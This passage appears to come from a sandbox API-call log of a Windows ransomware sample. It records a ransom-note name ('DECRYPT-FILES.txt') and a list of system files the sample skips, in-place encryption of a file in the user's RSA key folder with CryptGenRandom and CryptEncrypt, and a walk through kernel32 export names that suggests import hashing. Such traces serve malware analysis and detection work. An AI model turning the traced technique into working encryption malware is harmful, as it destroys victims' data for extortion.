cFileName="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="83AA4C~1")) returned 1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="DECRYPT-FILES.txt") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="autorun.inf") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="boot.ini") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="desktop.ini") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ntuser.dat") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="iconcache.db") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="bootsect.bak") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ntuser.dat.log") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="thumbs.db") returned -1 [0077.401] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Bootfont.bin") returned -1 [0077.401] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0077.401] lstrlenW (lpString="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0077.401] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0077.401] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0077.401] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0077.402] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=45) returned 1 [0077.402] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0077.402] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.402] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.403] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.403] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.404] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0077.404] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.405] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.405] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.405] CloseHandle (hObject=0x464) returned 1 [0077.405] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.405] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0077.406] CloseHandle (hObject=0x0) returned 0 [0077.406] CloseHandle (hObject=0x460) returned 1 [0077.407] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.407] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.407] GetTickCount () returned 0x114bdc4 [0077.407] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.408] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.408] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.408] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.408] lstrlenA (lpString="kernel32.dll") returned 12 [0077.408] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.408] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.408] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.409] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.409] lstrlenA (lpString="ADDATOMA") returned 8 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.409] lstrlenA (lpString="ADDATOMW") returned 8 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.409] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.409] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.409] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.409] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.409] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.409] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.409] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.409] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.409] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.409] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.409] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.409] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.409] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.409] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.409] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.409] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.409] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.410] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.410] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.410] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.410] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.410] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.410] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.410] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.410] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.410] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.410] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.410] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.410] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.410] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.410] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.410] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.410] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.410] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.410] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.410] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.410] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.411] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.411] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.411] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.411] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.411] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.411] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.411] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.411] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.411] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.411] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.411] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.411] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.411] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.411] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.411] lstrlenA (lpString="BEEP") returned 4 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.411] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.411] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.411] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.411] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.412] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.412] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.412] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.412] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.412] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.412] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.412] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.412] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.412] lstrlenA (lpString="CANCELIO") returned 8 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.412] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.412] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.412] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.412] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.412] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.412] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.412] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.412] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.412] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.412] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.412] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.413] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.413] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.413] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.413] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.413] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.413] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.413] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.413] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.413] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.413] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.413] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 